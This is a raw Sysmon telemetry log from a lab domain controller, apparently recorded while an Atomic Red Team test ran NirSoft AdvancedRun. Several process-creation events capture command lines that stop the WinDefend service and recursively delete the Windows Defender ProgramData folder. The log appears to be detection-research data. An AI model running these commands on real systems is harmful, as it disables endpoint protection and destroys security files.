734700x80000000000000003952910Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952909Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952908Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952907Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952906Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952905Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952904Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952903Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952902Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952901Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952899Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952898Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952897Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.481{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.481{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.481{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000003952894Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.481{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952893Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.481{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003952892Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.481{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003952891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.481{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003952890Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.481{834264DD-ED58-61EA-7D03-000000002702}22562932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000003952889Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.481{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 154100x80000000000000003952888Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.493{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-ED58-61EA-7D03-000000002702}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 734700x80000000000000003952887Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.481{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952886Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.481{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952885Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.481{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003952884Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.481{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003952883Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.481{834264DD-ED58-61EA-7D03-000000002702}22562932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003952882Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.490{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" /EXEFilename C:\Windows\System32\sc.exe /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-ED58-61EA-7D03-000000002702}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 154100x80000000000000003952631Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.262{834264DD-ED58-61EA-7D03-000000002702}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003952260Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003952259Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 